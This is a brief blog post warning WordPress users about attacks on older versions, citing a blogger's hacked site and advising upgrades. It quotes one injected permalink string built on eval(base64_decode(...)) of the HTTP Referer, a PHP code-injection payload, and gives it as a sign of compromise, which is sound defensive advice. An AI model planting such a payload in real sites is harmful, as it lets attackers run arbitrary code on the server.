Older versions of wordpress have security holes and are under attack.
Scooble’s Scoble’s wordpress blog was hacked, after which he isn’t feeling very safe. The worst part – he didn’t have a backup!
Here’s how you can check if you’re already being attacked:
There are two clues that your WordPress site has been attacked.
There are strange additions to the pretty permalinks, such as example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/. The keywords are “eval” and “base64_decode.”
Here’s a blog post from wordpress on How to Keep Your WordPress Secure:
A stitch in time saves nine. I couldn’t sew my way out of a bag, but it’s true advice for bloggers as well — a little bit of work on an upgrade now saves a lot of work fixing something later.